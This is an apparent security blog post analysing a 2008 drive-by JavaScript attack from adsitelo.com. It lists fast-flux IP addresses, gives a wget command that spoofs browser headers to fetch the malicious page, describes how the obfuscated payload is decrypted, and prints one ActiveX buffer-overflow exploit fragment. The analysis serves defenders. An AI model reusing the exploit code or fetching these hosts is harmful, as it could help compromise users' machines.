marco
blog
Menu:
JavaScript attack - part I
June 23, 2008
JavaScript-based attacks are getting more and more sophisticated, thanks
probably to the use of exploit toolkits. Here is an example of a few
days ago. The domain involved was adsitelo.com, which seems to have
been involved in a round of SQL injection attacks.
As a start, it is interesting to note that the domain was (likely)
fast-fluxed. Some of the IP addresses associated with it were
129.118.49.144, 150.254.2.155, 66.40.18.206, 70.244.115.171,
75.71.118.180, 79.94.146.249, 88.107.136.34, 99.234.157.198, and
99.246.193.180.
The initial step of the attack is a redirection: the page
http://adsitelo.com/cgi-bin/index.cgi?ad redirects to
http://adsitelo.com/cgi-bin/index.cgi?4d386e82074f01200077e0ed580235955ee1020576c246ff0000000000010000.
Now, if you tried to directly download the landing page, you would be
presented with a 500 error page. The real content, in fact, is reachable only
under two conditions: the User-Agent identifies the browser as Internet
Explorer or Firefox, and the Referer is correctly set.
wget allows us to quickly work around these problems:
$ wget --connect-timeout=3 --user-agent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" \
--referer=http://adsitelo.com/cgi-bin/index.cgi?ad \
"http://adsitelo.com/cgi-bin/index.cgi?4d386e82074f01200077e0ed580235955ee1020576c246ff0000000000010000"
The downloaded document is a JavaScript page:
function X88MxUL0B(U1TaW1TwV, IyxC82Rbo){var c5kJu150o = 4294967296;
var s3KRUV5X6 = arguments.callee;s3KRUV5X6 = s3KRUV5X6.toString();
s3KRUV5X6 = s3KRUV5X6 + location.href;var s4wL1Rf57 = eval;
var SLpdE73p3 = s3KRUV5X6.replace(/\W/g, "");SLpdE73p3 = SLpdE73p3.toUpperCase();
...
var Cm6B7c5TS = 0;try {s4wL1Rf57(LR8yTdO7t);} catch(e) {Cm6B7c5TS = 1;}
try {if (Cm6B7c5TS) {window.location = "/";}} catch(e) {}}
X88MxUL0B('ACada193b99ca7a4667B9668b2A3876BBF705b7Ba96799A578A165687
...
7C6E69667B6c6E6d7c6B69947C676d9A7d6D676279665F5f81');
The script consists of two parts: a decryption routine (named
X88MxUL0B) and the encrypted payload (the long string at the end of
the script). There are two things to notice
in the script:
- It uses the well-known
arguments.callee.toString()function to prevent modification to the body of the decryption routine. - The code uses the
location.hrefproperty as part of the decryption key, so that analyses that don't set it correctly will not be able to reconstruct the malicious payload. Another interesting feature of the script is that, on successive requests, the payload was encrypted using different keys, so that it appeared different.
In any case, decrypting the payload is not difficult. I just prepend the following lines to the original script and pass it to Rhino:
location={href:'http://adsitelo.com/cgi-bin/index.cgi?ad'};
eval=print;
The first sets the location.href property as required, the second
prints to the console all the strings passed to the eval function for
evaluation. The result is... another obfuscated script, exactly similar
to the one just decrypted. So, let's apply another round of decryption.
This time, we get a clear-text JavaScript script. The script sets a cookie (probably to show that exploitation is under way) and attempts to perform three attacks. The attacks seem to target vulnerabilities CVE-2006-5820, CVE-2007-5779, and CVE-2007-0015. The Firefox version of the malicious script contains only one attack, probably targeting CVE-2006-0005.
As an example, the code for one of these attacks is:
try {
var AMOoik_m = new ActiveXObject("GomWebCtrl.GomManager.1");
if (AMOoik_m) {
Exhne69P();
var Amce264J='';
var dHSLlQxf = 506;
for(var M13B4SOH=0;M13B4SOH<dHSLlQxf;M13B4SOH++)
Amce264J += "A";
Amce264J += unescape("%0c%0c%0c%0c");
dU578_go(13);
AMOoik_m.OpenURL(Amce264J);
}
} catch(e) {
}
The function dU578_go sets a cookie. The function Exhne69P uses heap
spray techniques to actually complete the exploit. But this is material
for another post :-)
To leave a comment, complete the form below. Mandatory fields are marked *.